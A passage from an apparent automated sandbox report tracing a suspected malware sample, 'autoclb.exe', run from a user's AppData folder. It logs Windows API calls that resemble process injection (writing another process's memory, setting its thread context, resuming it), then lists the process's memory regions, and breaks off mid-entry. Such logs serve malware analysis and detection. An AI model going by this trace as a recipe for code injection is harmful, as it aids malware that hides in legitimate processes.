[0200.421] CloseHandle (hObject=0x180) returned 1 [0200.421] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.427] VirtualFree (lpAddress=0x2170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.433] NtWriteVirtualMemory (in: ProcessHandle=0x17c, BaseAddress=0x7ffde008, Buffer=0x190c90*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x190af8 | out: Buffer=0x190c90*, NumberOfBytesWritten=0x190af8*=0x4) returned 0x0 [0200.464] SetThreadContext (hThread=0x178, lpContext=0x190cb0*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x40168d, Ebp=0x0, Eip=0x77a1aef0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0200.465] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190b2c | out: Wow64Process=0x190b2c) returned 1 [0200.468] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0200.469] GetFileSize (in: hFile=0x180, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0200.469] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000 [0200.469] ReadFile (in: hFile=0x180, lpBuffer=0x1ff0000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a50, lpOverlapped=0x0 | out: lpBuffer=0x1ff0000*, lpNumberOfBytesRead=0x190a50*=0x176638, lpOverlapped=0x0) returned 1 [0200.486] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000 [0200.507] CloseHandle (hObject=0x180) returned 1 [0200.507] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.514] VirtualFree (lpAddress=0x2170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.520] NtResumeThread (in: ThreadHandle=0x178, SuspendCount=0x190b30 | out: SuspendCount=0x190b30*=0x1) returned 0x0 [0200.594] CloseHandle (hObject=0x17c) returned 1 [0200.594] CloseHandle (hObject=0x178) returned 1 [0200.594] CloseHandle (hObject=0x184) returned 1 [0200.594] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x190b20 | out: Wow64Process=0x190b20) returned 1 [0200.598] CreateFileW (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0200.598] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x176638 [0200.598] VirtualAlloc (lpAddress=0x0, dwSize=0x176638, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000 [0200.598] ReadFile (in: hFile=0x184, lpBuffer=0x1ff0000, nNumberOfBytesToRead=0x176638, lpNumberOfBytesRead=0x190a58, lpOverlapped=0x0 | out: lpBuffer=0x1ff0000*, lpNumberOfBytesRead=0x190a58*=0x176638, lpOverlapped=0x0) returned 1 [0200.659] VirtualAlloc (lpAddress=0x0, dwSize=0x179000, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000 [0200.676] CloseHandle (hObject=0x184) returned 1 [0200.676] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.682] VirtualFree (lpAddress=0x2170000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0200.711] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x1f30000) returned 0x0 [0200.715] ExitProcess (uExitCode=0x0) Thread: id = 27 os_tid = 0x3ec Process: id = "10" image_name = "autoclb.exe" filename = "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw\\autoclb.exe" page_root = "0x30d16000" os_pid = "0x51c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0x5f0" cmd_line = "\"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 923 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 924 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 925 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 926 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 927 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 928 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 929 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 930 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 931 start_va = 0x400000 end_va = 0x512fff entry_point = 0x400000 region_type = mapped_file name = "autoclb.exe" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw\\autoclb.exe") Region: id = 932 start_va = 0x779b0000 end_va = 0x77b28fff entry_point = 0x779b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 933 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 934 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 935 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 936 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 937 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 938 start_va = 0x7fff0000 end_va = 0x7ff977f2ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 939 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 940 start_va = 0x7ff9780f2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ff9780f2000" filename = "" Region: id = 947 start_va = 0x400000 end_va = 0x470fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 955 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 956 start_va = 0x61eb0000 end_va = 0x61efefff entry_point = 0x61eb0000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 957 start_va = 0x61f10000 end_va = 0x61f82fff entry_point = 0x61f10000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 958 start_va = 0x61f00000 end_va = 0x61f07fff entry_point = 0x61f00000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 959 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 960 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 961 start_va = 0x210000 end_va = 0x2cdfff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 962 start_va = 0x2d0000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 963 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 964 start_va = 0x590000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 965 start_va = 0x74a50000 end_va = 0x74aa8fff entry_point = 0x74a50000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 966 start_va = 0x74ab0000 end_va = 0x74ab9fff entry_point = 0x74ab0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 967 start_va = 0x74ac0000 end_va = 0x74addfff entry_point = 0x74ac0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 968 start_va = 0x74ae0000 end_va = 0x74b22fff entry_point = 0x74ae0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 969 start_va = 0x74bb0000 end_va = 0x74d69fff entry_point = 0x74bb0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 970 start_va = 0x74d70000 end_va = 0x74e5ffff entry_point = 0x74d70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 971 start_va = 0x74e60000 end_va = 0x75004fff entry_point = 0x74e60000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 972 start_va = 0x75190000 end_va = 0x751d3fff entry_point = 0x75190000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 973 start_va = 0x75210000 end_va = 0x765cefff entry_point = 0x75210000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 974 start_va = 0x765d0000 end_va = 0x7665cfff entry_point = 0x765d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 975 start_va = 0x766f0000 end_va = 0x7682ffff entry_point = 0x766f0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 976 start_va = 0x76a50000 end_va = 0x76f2cfff entry_point = 0x76a50000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 977 start_va = 0x770a0000 end_va = 0x770e3fff entry_point = 0x770a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 978 start_va = 0x770f0000 end_va = 0x7719bfff entry_point = 0x770f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 979 start_va = 0x77200000 end_va = 0x7720bfff entry_point = 0x77200000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 980 start_va = 0x77210000 end_va = 0x77245fff entry_point = 0x77210000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 981 start_va = 0x77250000 end_va = 0x77339fff entry_point = 0x77250000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 982 start_va = 0x77340000 end_va = 0x7734efff entry_point = 0x77340000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 983 start_va = 0x773b0000 end_va = 0x774fcfff entry_point = 0x773b0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 984 start_va = 0x77510000 end_va = 0x7758afff entry_point = 0x77510000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 985 start_va = 0x77600000 end_va = 0x776bdfff entry_point = 0x77600000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 986 start_va = 0x77830000 end_va = 0x779a5fff entry_point = 0x77830000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 987 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 988 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 990 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 991 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 992 start_va = 0x310000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 993 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 994 start_va = 0x690000 end_va = 0x817fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 995 start_va = 0x820000 end_va = 0x9a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 996 start_va = 0x9b0000 end_va = 0x1daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 997 start_va = 0x1db0000 end_va = 0x1eaffff entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 998 start_va = 0x751e0000 end_va = 0x7520afff entry_point = 0x751e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 999 start_va = 0x76890000 end_va = 0x769affff entry_point = 0x76890000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1000 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1002 start_va = 0x1eb0000 end_va = 0x23dffff entry_point = 0x0 region_type = private name = "private_0x0000000001eb0000" filename = "" Region: id = 1003 start_va = 0x74a20000 end_va = 0x74a40fff entry_point = 0x74a20000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 1004 start_va = 0x23e0000 end_va = 0x2716fff entry_point = 0x23e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1005 start_va = 0x771a0000 end_va = 0x771e1fff entry_point = 0x771a0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1006 start_va = 0x76f30000 end_va = 0x76f3dfff entry_point = 0x76f30000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1007 start_va = 0x75010000 end_va = 0x75184fff entry_point = 0x75010000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1008 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1023 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1024 start_va = 0x2720000 end_va = 0x28e1fff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 1025 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1026 start_va = 0x2720000 end_va = 0x28e1fff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 1027 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1028 start_va = 0x2720000 end_va = 0x28e1fff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 1029 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 1030 start_va = 0x2720000 end_va = 0x28e1fff entry_point = 0x0 region_type = private name = "private_0x0000000002720000" filename = "" Region: id = 1042 start_va = 0x2720000 end_va = 0x2852fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002720000" filename = "" Region: id = 1044 start_va = 0x160000 end_va = 